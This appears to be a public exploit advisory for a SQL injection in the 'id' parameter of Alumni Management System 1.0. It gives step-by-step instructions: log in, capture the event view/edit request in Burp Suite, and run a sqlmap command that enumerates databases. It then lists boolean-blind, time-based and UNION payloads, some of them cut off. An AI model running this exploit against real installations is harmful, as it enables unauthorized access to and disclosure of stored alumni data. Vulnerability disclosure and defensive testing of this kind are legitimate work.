Alumni Management System 1.0 SQL Injection

Alumni Management System version 1.0 suffers from a remote SQL injection vulnerability. SQL injection was originally discovered in this version in October of 2020 by Ankita Pal.

MD5 | 3530b1783c3bd5c9e6bca1bb8841ab0c

# Exploit Title: Alumni Management System 1.0 - 'id' SQL Injection
# Exploit Author: Aakash Madaan
# Date: 2020-12-17
# Vendor Homepage:
# Software Link:
# Affected Version: Version 1
# Tested on: Parrot OS

Step 1. Login to the application with admin credentials

Step 2. Click on "Events" page.

Step 3. Choose any event and select "view" or "edit". The url should be "
http://localhost/index.php?page=view_event&id=2" or "

Step 4. Capture the request to the "view" or "edit" event page in burpsuite.

Step 5. Save the captured request and run sqlmap on it using "sqlmap -r
request --time-sec=5 --dbs

Parameter: id (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: page=edit_student&id=(SELECT (CASE WHEN (6191=6191) THEN 3

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=edit_student&id=3 AND (SELECT 7847 FROM

Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: page=edit_student&id=-4840 UNION ALL SELECT

Step 6. Sqlmap should inject the web-app successfully which leads to
information disclosure

Related Posts